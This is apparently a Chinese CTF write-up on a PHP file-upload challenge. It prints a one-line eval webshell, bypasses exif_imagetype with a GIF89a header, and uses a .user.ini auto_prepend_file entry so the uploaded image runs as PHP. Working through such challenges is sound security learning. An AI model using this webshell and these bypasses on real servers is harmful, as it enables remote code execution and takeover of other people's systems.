一个文件上传的题目,直接上传php文件试试,发现被过滤了
然后再上传一个把后缀名改为png的一句话
发现不能右?,那就用无<?的一句话
<script language="php">eval($_GET['cmd']);</script>
再次上传png后缀的一句话,提示
exif_imagetype,这个函数是获取文件的第一个字节,来确定文件是什么类型,那就直接再文件的开头加一个GIF89a来绕过
上传成功,但是无法解析内容,试了试上传.htaccess文件,但是无法利用,看了下,说是nginx的服务器,不是apache的,所以不能用.htaccess文件,但是不知道怎么看出来的
那就换一个,用.user.ini文件,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。
其中有两个配置,可以用来制造后门:
auto_append_file、auto_prepend_file
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:
auto_prepend_file=test.jpg
或者
auto_append_file=test.jpg
使文件解析为php文件的前提是包含再一个php文件中,所以就利用index.php文件来使之解析
对于这题就是要根据提示来改变自己的一句话形式,多用.htaccess或者.user.ini这样的好东西。